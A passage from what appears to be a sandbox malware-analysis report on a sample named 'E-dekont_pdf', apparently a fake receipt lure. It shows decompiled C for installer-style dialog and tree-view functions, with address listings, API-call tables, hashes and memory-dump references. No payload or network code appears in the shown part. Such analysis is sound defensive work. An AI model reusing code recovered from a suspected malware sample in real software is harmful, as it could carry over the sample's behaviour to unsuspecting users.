									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x470278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x44672c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x446740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x44672c = 0;
								 *0x446740 = 0;
								 *0x4702c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x470279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x446740;
									_t201 =  *0x470288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x47028c <= 0) {
										L86:
										if( *0x47031e == 0x400) {
											InvalidateRect(_v8, 0, "true");
										}
										if( *((intOrPtr*)( *0x46823c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x1006]);
									} while (_v24 <  *0x47028c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x446740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x4702c0 = _t291;
					 *0x446740 = GlobalAlloc(0x40,  *0x47028c << 2);
					_t258 = LoadImageW( *0x470260, 0x6e, 0, 0, 0, 0);
					 *0x446734 =  *0x446734 | 0xffffffff;
					_t297 = _t258;
					 *0x44673c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x44672c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x44672c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x47028c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x446740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x446740 + _t300 * 4) = _t284;
									_v16 =  *( *0x446740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x4018]);
							_v32 = _t319;
						} while (_t300 <  *0x47028c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                              0x00405038
                                                                                              0x00405051
                                                                                              0x00405056
                                                                                              0x0040505e
                                                                                              0x00405064
                                                                                              0x0040507a
                                                                                              0x0040507d
                                                                                              0x004052a8
                                                                                              0x004052af
                                                                                              0x004052c3
                                                                                              0x004052b1
                                                                                              0x004052b3
                                                                                              0x004052b6
                                                                                              0x004052b7
                                                                                              0x004052be
                                                                                              0x004052be
                                                                                              0x004052cf
                                                                                              0x004052dd
                                                                                              0x004052e0
                                                                                              0x004052f6
                                                                                              0x0040536b
                                                                                              0x0040536e
                                                                                              0x00405370
                                                                                              0x0040537a
                                                                                              0x00405388
                                                                                              0x00405388
                                                                                              0x0040538a
                                                                                              0x00405394
                                                                                              0x0040539a
                                                                                              0x0040539d
                                                                                              0x004053a0
                                                                                              0x004053bb
                                                                                              0x004053a2
                                                                                              0x004053ac
                                                                                              0x004053ac
                                                                                              0x004053a0
                                                                                              0x00405394
                                                                                              0x00000000
                                                                                              0x0040536e
                                                                                              0x004052fb
                                                                                              0x00405306
                                                                                              0x0040530b
                                                                                              0x00405312
                                                                                              0x00405317
                                                                                              0x0040531b
                                                                                              0x00405326
                                                                                              0x00405326
                                                                                              0x0040532a
                                                                                              0x0040532e
                                                                                              0x00405332
                                                                                              0x00405345
                                                                                              0x00405334
                                                                                              0x00405334
                                                                                              0x0040533b
                                                                                              0x00405341
                                                                                              0x0040533d
                                                                                              0x0040533d
                                                                                              0x0040533d
                                                                                              0x0040533b
                                                                                              0x00405349
                                                                                              0x0040534b
                                                                                              0x0040535e
                                                                                              0x00405361
                                                                                              0x00405364
                                                                                              0x00405364
                                                                                              0x0040532e
                                                                                              0x00000000
                                                                                              0x0040531b
                                                                                              0x004052fd
                                                                                              0x00405304
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004053be
                                                                                              0x004053be
                                                                                              0x004053c5
                                                                                              0x00405436
                                                                                              0x0040543e
                                                                                              0x00405446
                                                                                              0x00405446
                                                                                              0x0040544f
                                                                                              0x00405451
                                                                                              0x00405458
                                                                                              0x0040545b
                                                                                              0x0040545b
                                                                                              0x00405461
                                                                                              0x00405468
                                                                                              0x0040546b
                                                                                              0x0040546b
                                                                                              0x00405471
                                                                                              0x00405477
                                                                                              0x0040547d
                                                                                              0x0040547d
                                                                                              0x0040548a
                                                                                              0x004055eb
                                                                                              0x004055f2
                                                                                              0x0040560f
                                                                                              0x00405615
                                                                                              0x00405627
                                                                                              0x00405627
                                                                                              0x00000000
                                                                                              0x00405490
                                                                                              0x00405492
                                                                                              0x00405497
                                                                                              0x0040549c
                                                                                              0x004054a1
                                                                                              0x004054a3
                                                                                              0x004054a3
                                                                                              0x004054a4
                                                                                              0x004054a5
                                                                                              0x004054a7
                                                                                              0x004054a7
                                                                                              0x004054af
                                                                                              0x004054f0
                                                                                              0x004054f2
                                                                                              0x00405502
                                                                                              0x00405505
                                                                                              0x0040550a
                                                                                              0x00405511
                                                                                              0x00405514
                                                                                              0x004055b6
                                                                                              0x004055bf
                                                                                              0x004055c7
                                                                                              0x004055c7
                                                                                              0x004055d5
                                                                                              0x004055e6
                                                                                              0x004055e6
                                                                                              0x00000000
                                                                                              0x004055d5
                                                                                              0x0040551a
                                                                                              0x0040551d
                                                                                              0x00405523
                                                                                              0x00405528
                                                                                              0x0040552a
                                                                                              0x0040552c
                                                                                              0x00405532
                                                                                              0x00405539
                                                                                              0x0040553e
                                                                                              0x00405545
                                                                                              0x00405548
                                                                                              0x00405548
                                                                                              0x0040554f
                                                                                              0x0040555b
                                                                                              0x0040555f
                                                                                              0x00405561
                                                                                              0x00405561
                                                                                              0x00405551
                                                                                              0x00405553
                                                                                              0x00405553
                                                                                              0x00405581
                                                                                              0x0040558d
                                                                                              0x0040559c
                                                                                              0x0040559c
                                                                                              0x0040559e
                                                                                              0x004055a1
                                                                                              0x004055aa
                                                                                              0x00000000
                                                                                              0x004054b1
                                                                                              0x004054bc
                                                                                              0x004054bf
                                                                                              0x004054c4
                                                                                              0x004054c6
                                                                                              0x004054ca
                                                                                              0x004054da
                                                                                              0x004054e4
                                                                                              0x004054e6
                                                                                              0x004054e9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004054cc
                                                                                              0x004054cc
                                                                                              0x004054d2
                                                                                              0x004054d4
                                                                                              0x004054d4
                                                                                              0x004054d5
                                                                                              0x004054d6
                                                                                              0x00000000
                                                                                              0x004054cc
                                                                                              0x004054af
                                                                                              0x0040548a
                                                                                              0x004053cd
                                                                                              0x00000000
                                                                                              0x004053e3
                                                                                              0x004053ed
                                                                                              0x004053f2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405404
                                                                                              0x00405409
                                                                                              0x00405415
                                                                                              0x00405415
                                                                                              0x00405417
                                                                                              0x00405426
                                                                                              0x00405428
                                                                                              0x0040542c
                                                                                              0x0040542f
                                                                                              0x00000000
                                                                                              0x0040542f
                                                                                              0x004053cd
                                                                                              0x00405083
                                                                                              0x00405088
                                                                                              0x00405091
                                                                                              0x00405098
                                                                                              0x004050aa
                                                                                              0x004050b5
                                                                                              0x004050bb
                                                                                              0x004050c9
                                                                                              0x004050dd
                                                                                              0x004050e2
                                                                                              0x004050ef
                                                                                              0x004050f4
                                                                                              0x0040510a
                                                                                              0x0040511b
                                                                                              0x00405128
                                                                                              0x00405128
                                                                                              0x0040512b
                                                                                              0x00405131
                                                                                              0x00405133
                                                                                              0x00405136
                                                                                              0x0040513b
                                                                                              0x00405140
                                                                                              0x00405142
                                                                                              0x00405142
                                                                                              0x00405162
                                                                                              0x00405162
                                                                                              0x00405164
                                                                                              0x00405165
                                                                                              0x0040516a
                                                                                              0x00405170
                                                                                              0x00405174
                                                                                              0x00405179
                                                                                              0x00405181
                                                                                              0x00405185
                                                                                              0x0040518a
                                                                                              0x0040518f
                                                                                              0x00405197
                                                                                              0x0040519a
                                                                                              0x0040526a
                                                                                              0x0040527d
                                                                                              0x00000000
                                                                                              0x004051a0
                                                                                              0x004051a3
                                                                                              0x004051a6
                                                                                              0x004051a9
                                                                                              0x004051a9
                                                                                              0x004051af
                                                                                              0x004051b8
                                                                                              0x004051bb
                                                                                              0x004051bf
                                                                                              0x004051c2
                                                                                              0x004051c5
                                                                                              0x004051ce
                                                                                              0x004051d7
                                                                                              0x004051da
                                                                                              0x004051dd
                                                                                              0x004051e0
                                                                                              0x0040521e
                                                                                              0x00405249
                                                                                              0x00405220
                                                                                              0x0040522f
                                                                                              0x0040522f
                                                                                              0x004051e2
                                                                                              0x004051e5
                                                                                              0x004051f3
                                                                                              0x004051fd
                                                                                              0x00405205
                                                                                              0x0040520c
                                                                                              0x00405217
                                                                                              0x00405217
                                                                                              0x004051e0
                                                                                              0x0040524f
                                                                                              0x00405250
                                                                                              0x0040525c
                                                                                              0x0040525c
                                                                                              0x00405268
                                                                                              0x00405283
                                                                                              0x00405286
                                                                                              0x004052a3
                                                                                              0x00000000
                                                                                              0x00405288
                                                                                              0x0040528d
                                                                                              0x00405296
                                                                                              0x00405629
                                                                                              0x0040563b
                                                                                              0x0040563b
                                                                                              0x00405286
                                                                                              0x00000000
                                                                                              0x00405268
                                                                                              0x0040519a

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                                              • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                              • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,?,00404424), ref: 00404607
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                              • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 004055C7
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                                              • ShowWindow.USER32(00000000), ref: 00405627
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 2564846305-813528018
                                                                                              • Opcode ID: f342b2ff2a1de1bdf3936ee1adf059a0cb1e2d4912d96edb55e6fc8441d0539d
                                                                                              • Instruction ID: f7e32dcb43f150de83e4d77aaef29a32e3e137ec9d30c8444ea22e26c387a39b
                                                                                              • Opcode Fuzzy Hash: f342b2ff2a1de1bdf3936ee1adf059a0cb1e2d4912d96edb55e6fc8441d0539d
                                                                                              • Instruction Fuzzy Hash: 60026C70900609EFDB20DFA9CD49AAF7BB5FB45314F10817AE614BA2E1D7798981CF18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x436714 =  *0x436714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x460200;
							if(_t103 - _t113 < 0x4000) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push("true");
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x470268, 0x111, "true", 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x470268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x436714 != 0) {
						goto L27;
					} else {
						_t69 =  *0x43e720; // 0x66d65c
						_t29 = _t69 + 0x14; // 0x66d670
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x46823c - 4 + _t75 * 4);
				}
				_t76 =  *0x470298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push("true");
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, "true", 0);
				_t92 =  *( *0x470270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x436714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x436714 = 0;
				return 0;
			}



















                                                                                              0x00404795
                                                                                              0x004048c2
                                                                                              0x0040491f
                                                                                              0x00404923
                                                                                              0x004049f0
                                                                                              0x004049f2
                                                                                              0x004049f2
                                                                                              0x004049f8
                                                                                              0x004049f8
                                                                                              0x004049fb
                                                                                              0x00000000
                                                                                              0x00404a02
                                                                                              0x00404931
                                                                                              0x00404937
                                                                                              0x00404941
                                                                                              0x0040494c
                                                                                              0x0040494f
                                                                                              0x00404952
                                                                                              0x0040495d
                                                                                              0x00404960
                                                                                              0x00404967
                                                                                              0x00404974
                                                                                              0x00404985
                                                                                              0x0040498b
                                                                                              0x00404993
                                                                                              0x004049a1
                                                                                              0x004049a7
                                                                                              0x004049a7
                                                                                              0x00404967
                                                                                              0x004049b1
                                                                                              0x00000000
                                                                                              0x004049bc
                                                                                              0x004049c0
                                                                                              0x004049d0
                                                                                              0x004049d0
                                                                                              0x004049d6
                                                                                              0x004049e2
                                                                                              0x004049e2
                                                                                              0x00000000
                                                                                              0x004049e6
                                                                                              0x004049b1
                                                                                              0x004048cd
                                                                                              0x00000000
                                                                                              0x004048df
                                                                                              0x004048df
                                                                                              0x004048e4
                                                                                              0x004048e4
                                                                                              0x004048ea
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404913
                                                                                              0x00404915
                                                                                              0x0040491a
                                                                                              0x00000000
                                                                                              0x0040491a
                                                                                              0x004048cd
                                                                                              0x0040479b
                                                                                              0x0040479e
                                                                                              0x004047a3
                                                                                              0x004047b4
                                                                                              0x004047b4
                                                                                              0x004047bc
                                                                                              0x004047bf
                                                                                              0x004047c3
                                                                                              0x004047c6
                                                                                              0x004047ca
                                                                                              0x004047cd
                                                                                              0x004047d0
                                                                                              0x004047d3
                                                                                              0x004047da
                                                                                              0x004047dc
                                                                                              0x004047dc
                                                                                              0x004047e6
                                                                                              0x004047f3
                                                                                              0x004047fd
                                                                                              0x00404802
                                                                                              0x00404805
                                                                                              0x0040480a
                                                                                              0x00404821
                                                                                              0x00404828
                                                                                              0x0040483b
                                                                                              0x0040483e
                                                                                              0x00404852
                                                                                              0x00404859
                                                                                              0x0040485e
                                                                                              0x00404863
                                                                                              0x00404863
                                                                                              0x00404871
                                                                                              0x0040487f
                                                                                              0x00404891
                                                                                              0x00404896
                                                                                              0x004048a6
                                                                                              0x004048a8
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404821
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404852
                                                                                              • GetSysColor.USER32(?), ref: 00404863
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                              • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                                              • SendMessageW.USER32(00000000), ref: 00404906
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                              • SetCursor.USER32(00000000), ref: 00404985
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                              • SetCursor.USER32(00000000), ref: 004049A1
                                                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 004049D0
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                              • String ID: Call$N
                                                                                              • API String ID: 3103080414-3438112850
                                                                                              • Opcode ID: 4782b9b4eda84373534ba60df76701eed62442430a03cc08abb51f4845f57d20
                                                                                              • Instruction ID: 2e63217677652f59b4b2df67e99a4f785984152936c7793f9fd668dd7aaa3dc2
                                                                                              • Opcode Fuzzy Hash: 4782b9b4eda84373534ba60df76701eed62442430a03cc08abb51f4845f57d20
                                                                                              • Instruction Fuzzy Hash: 8D618DF1900209BFDB10AF61DD85A6A7B69FB44304F00813AF705B62D1CB78AD51DFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 90%
                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
